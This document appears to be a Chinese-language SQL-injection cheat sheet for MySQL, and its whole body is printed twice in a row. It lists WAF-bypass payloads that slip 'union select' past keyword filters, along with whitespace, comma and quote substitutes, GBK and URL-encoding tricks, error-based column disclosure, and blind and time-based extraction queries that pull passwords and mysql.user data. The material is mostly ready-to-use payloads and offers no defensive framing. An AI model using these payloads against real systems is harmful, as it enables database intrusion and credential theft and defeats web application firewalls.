1 直接上语法
2 select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
3 select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
4 select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0
5 因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
6 我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点击指数后语境结束,之后就直接执行后面的语句了。
7 ==================================================
8 where id=.1union/*.1*/select-.1
9 where id=.1union/*.1*/select!.1
10 where id=.1union/*.1*/select~.1
11 where id=.1union/*.1*/select(1)
12 where id=.1union/*.1*/select`host`from mysql.user
13 where id=.1union/*.1*/select'1'
14 where id=.1union/*.1*/select"1"
15 where id=.1union/*.1*/select@1
16 ================================================
17 mysql研究方向.txt
18 Mysql:
19 空格,且与符号(and or),单引号,逗号",",双引号",截断符号如:(# -- /*)
20
21 空格:
22 select * from(user);
23 select * from`user`;
24 'and(true)like(false)union(select(pass)from(users))#
25 'union [all|distinct] select pass from users#
26 09 Horizontal Tab
27 0A New Line
28 0B Vertical Tab
29 0C New Page
30 0D Carriage Return
31 A0 Non-breaking Space
32 20 Space
33
34 且与符号(and or):
35 select * from user where host ='localhost' && 0=0 limit 0,1;
36 select * from user where host ='localhost' || 1=1 limit 0,1;
37
38 20 Space
39 2B +
40 2D -
41 7E ~
42 21 !
43 40 @
44 Example:
45 SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))
46
47 ● Prefixes (combine arbitrarily 任意组合 单目运算符): + - ~ !
48 ' or --+2=- -!!!'2
49 ● Operators: ^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>,<=>,
50 XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...
51 ' or 1
52 单引号:
53 '-GBK编码%df';'-%2527 UNICODE编码
54
55
56 逗号:
57 UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c)
58 //利用MySQL出错爆出字段
59 mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;
60 ERROR 1060 (42S21): Duplicate column name 'Host'
61 mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host)) C;
62 ERROR 1060 (42S21): Duplicate column name 'User'
63 mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host,User)) C;
64 ERROR 1060 (42S21): Duplicate column name 'Password'
65
66 双引号:
67 类同单引号的思路
68
69 编码:
70 ' or 'a' = n'a # unicode
71 ' or 'a' = b'1100001 # binary
72 ' or 'a' = x'61 # hexadecimal
73 ' and substr(data,1,1) = 0x61# 0x6162
74 ' and substr(data,1,1) = unhex(61)# unhex(6162)
75 ' and substr(data,1,1) = char(97)# char(97,98)
76 String builder (3)
77 ● Previous functions are well known
78 ● My favourite:
79 ' and substr(data,1,1) = lower(conv(10,10,36))# 'a'
80 ' and substr(data,1,1) = lower(conv(11,10,36))# 'b'
81 ' and substr(data,1,1) = lower(conv(36,10,36))# 'z'
82
83
84 截断符号:
85 常见的:# -- /*
86 -- - SQL comment
87 ;%00 Nullbyte
88 ` Backtick
89
90
91 盲注:
92 AND MID(VERSION(),1,1) = '5'
93 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
94 ' and substr(data,1,1) = 'a'#
95 ' and substring(data,1,1) = 'a'#
96 ' and mid(data,1,1) = 'a'#
97 ● All 3 functions work without comma(逗号) too:
98 ' and substr(data from 1 for 1) = 'a'#
99 lpad(data,1,space(1)) // lpad('hi',4,'?') = '??hi'
100 rpad(data,1,space(1)) // rpad('hi',4,'?') = 'hi??'
101 left(data,1)
102 reverse(right(reverse(data),1))
103 insert(insert(version(),1,0,space(0)),2,222,space(0))
104 ● Subselect:
105 1'and 0x61=(/*foo*/SELECT mid(pass,1,1) from users limit
106 1,1)and'1
107
108 Some functions allow to search substrings:
109 '-if(locate('f',data),1,0)#
110 '-if(locate('fo',data),1,0)#
111 '-if(locate('foo',data),1,0)#
112
113 ● Some functions allow to cut substrings:
114 length(trim(leading 'a' FROM data)) # length will be shorter
115 length(replace(data, 'a', '')) # length will be shorter
116
117 Subselect:
118 foo'div count(select`pass`from(users)where mid(pass,1,1)rlike
119 lower(conv(10,pi()*pi(),pi()*pi())) )-'0
120
121 Blind SQL Injection
122 Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))
123
124
125
126 延迟:
127 ' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '
128
129
130 Nope:
131 false !pi() 0 ceil(pi()*pi()) 10 ceil((pi()+pi())*pi()) 20
132 true !!pi() 1 ceil(pi()*pi())+true 11 ceil(ceil(pi())*version()) 21
133 true+true 2 ceil(pi()+pi()+version()) 12 ceil(pi()*ceil(pi()+pi())) 22
134 floor(pi()) 3 floor(pi()*pi()+pi()) 13 ceil((pi()+ceil(pi()))*pi()) 23
135 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 ceil(pi())*ceil(version()) 24
136 floor(version()) 5 ceil(pi()*pi()+version()) 15 floor(pi()*(version()+pi())) 25
137 ceil(version()) 6 floor(pi()*version()) 16 floor(version()*version()) 26
138 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 ceil(version()*version()) 27
139 floor(version()+pi()) 8 ceil(pi()*version())+true 18 ceil(pi()*pi()*pi()-pi()) 28
140 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 floor(pi()*pi()*floor(pi())) 29
141
142
143 conv([10-36],10,36)
144 false !pi() 0 ceil(pi()*pi()) 10 A ceil((pi()+pi())*pi()) 20 K
145 true !!pi() 1 ceil(pi()*pi())+true 11 B ceil(ceil(pi())*version()) 21 L
146 true+true 2 ceil(pi()+pi()+version()) 12 C ceil(pi()*ceil(pi()+pi())) 22 M
147 floor(pi()) 3 floor(pi()*pi()+pi()) 13 D ceil((pi()+ceil(pi()))*pi()) 23 N
148 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 E ceil(pi())*ceil(version()) 24 O
149 floor(version()) 5 ceil(pi()*pi()+version()) 15 F floor(pi()*(version()+pi())) 25 P
150 ceil(version()) 6 floor(pi()*version()) 16 G floor(version()*version()) 26 Q
151 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 H ceil(version()*version()) 27 R
152 floor(version()+pi()) 8 ceil(pi()*version())+true 18 I ceil(pi()*pi()*pi()-pi()) 28 S
153 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 J floor(pi()*pi()*floor(pi())) 29 T
2 select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
3 select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
4 select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0
5 因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
6 我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点击指数后语境结束,之后就直接执行后面的语句了。
7 ==================================================
8 where id=.1union/*.1*/select-.1
9 where id=.1union/*.1*/select!.1
10 where id=.1union/*.1*/select~.1
11 where id=.1union/*.1*/select(1)
12 where id=.1union/*.1*/select`host`from mysql.user
13 where id=.1union/*.1*/select'1'
14 where id=.1union/*.1*/select"1"
15 where id=.1union/*.1*/select@1
16 ================================================
17 mysql研究方向.txt
18 Mysql:
19 空格,且与符号(and or),单引号,逗号",",双引号",截断符号如:(# -- /*)
20
21 空格:
22 select * from(user);
23 select * from`user`;
24 'and(true)like(false)union(select(pass)from(users))#
25 'union [all|distinct] select pass from users#
26 09 Horizontal Tab
27 0A New Line
28 0B Vertical Tab
29 0C New Page
30 0D Carriage Return
31 A0 Non-breaking Space
32 20 Space
33
34 且与符号(and or):
35 select * from user where host ='localhost' && 0=0 limit 0,1;
36 select * from user where host ='localhost' || 1=1 limit 0,1;
37
38 20 Space
39 2B +
40 2D -
41 7E ~
42 21 !
43 40 @
44 Example:
45 SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))
46
47 ● Prefixes (combine arbitrarily 任意组合 单目运算符): + - ~ !
48 ' or --+2=- -!!!'2
49 ● Operators: ^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>,<=>,
50 XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...
51 ' or 1
52 单引号:
53 '-GBK编码%df';'-%2527 UNICODE编码
54
55
56 逗号:
57 UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c)
58 //利用MySQL出错爆出字段
59 mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;
60 ERROR 1060 (42S21): Duplicate column name 'Host'
61 mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host)) C;
62 ERROR 1060 (42S21): Duplicate column name 'User'
63 mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host,User)) C;
64 ERROR 1060 (42S21): Duplicate column name 'Password'
65
66 双引号:
67 类同单引号的思路
68
69 编码:
70 ' or 'a' = n'a # unicode
71 ' or 'a' = b'1100001 # binary
72 ' or 'a' = x'61 # hexadecimal
73 ' and substr(data,1,1) = 0x61# 0x6162
74 ' and substr(data,1,1) = unhex(61)# unhex(6162)
75 ' and substr(data,1,1) = char(97)# char(97,98)
76 String builder (3)
77 ● Previous functions are well known
78 ● My favourite:
79 ' and substr(data,1,1) = lower(conv(10,10,36))# 'a'
80 ' and substr(data,1,1) = lower(conv(11,10,36))# 'b'
81 ' and substr(data,1,1) = lower(conv(36,10,36))# 'z'
82
83
84 截断符号:
85 常见的:# -- /*
86 -- - SQL comment
87 ;%00 Nullbyte
88 ` Backtick
89
90
91 盲注:
92 AND MID(VERSION(),1,1) = '5'
93 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
94 ' and substr(data,1,1) = 'a'#
95 ' and substring(data,1,1) = 'a'#
96 ' and mid(data,1,1) = 'a'#
97 ● All 3 functions work without comma(逗号) too:
98 ' and substr(data from 1 for 1) = 'a'#
99 lpad(data,1,space(1)) // lpad('hi',4,'?') = '??hi'
100 rpad(data,1,space(1)) // rpad('hi',4,'?') = 'hi??'
101 left(data,1)
102 reverse(right(reverse(data),1))
103 insert(insert(version(),1,0,space(0)),2,222,space(0))
104 ● Subselect:
105 1'and 0x61=(/*foo*/SELECT mid(pass,1,1) from users limit
106 1,1)and'1
107
108 Some functions allow to search substrings:
109 '-if(locate('f',data),1,0)#
110 '-if(locate('fo',data),1,0)#
111 '-if(locate('foo',data),1,0)#
112
113 ● Some functions allow to cut substrings:
114 length(trim(leading 'a' FROM data)) # length will be shorter
115 length(replace(data, 'a', '')) # length will be shorter
116
117 Subselect:
118 foo'div count(select`pass`from(users)where mid(pass,1,1)rlike
119 lower(conv(10,pi()*pi(),pi()*pi())) )-'0
120
121 Blind SQL Injection
122 Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))
123
124
125
126 延迟:
127 ' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '
128
129
130 Nope:
131 false !pi() 0 ceil(pi()*pi()) 10 ceil((pi()+pi())*pi()) 20
132 true !!pi() 1 ceil(pi()*pi())+true 11 ceil(ceil(pi())*version()) 21
133 true+true 2 ceil(pi()+pi()+version()) 12 ceil(pi()*ceil(pi()+pi())) 22
134 floor(pi()) 3 floor(pi()*pi()+pi()) 13 ceil((pi()+ceil(pi()))*pi()) 23
135 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 ceil(pi())*ceil(version()) 24
136 floor(version()) 5 ceil(pi()*pi()+version()) 15 floor(pi()*(version()+pi())) 25
137 ceil(version()) 6 floor(pi()*version()) 16 floor(version()*version()) 26
138 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 ceil(version()*version()) 27
139 floor(version()+pi()) 8 ceil(pi()*version())+true 18 ceil(pi()*pi()*pi()-pi()) 28
140 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 floor(pi()*pi()*floor(pi())) 29
141
142
143 conv([10-36],10,36)
144 false !pi() 0 ceil(pi()*pi()) 10 A ceil((pi()+pi())*pi()) 20 K
145 true !!pi() 1 ceil(pi()*pi())+true 11 B ceil(ceil(pi())*version()) 21 L
146 true+true 2 ceil(pi()+pi()+version()) 12 C ceil(pi()*ceil(pi()+pi())) 22 M
147 floor(pi()) 3 floor(pi()*pi()+pi()) 13 D ceil((pi()+ceil(pi()))*pi()) 23 N
148 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 E ceil(pi())*ceil(version()) 24 O
149 floor(version()) 5 ceil(pi()*pi()+version()) 15 F floor(pi()*(version()+pi())) 25 P
150 ceil(version()) 6 floor(pi()*version()) 16 G floor(version()*version()) 26 Q
151 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 H ceil(version()*version()) 27 R
152 floor(version()+pi()) 8 ceil(pi()*version())+true 18 I ceil(pi()*pi()*pi()-pi()) 28 S
153 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 J floor(pi()*pi()*floor(pi())) 29 T
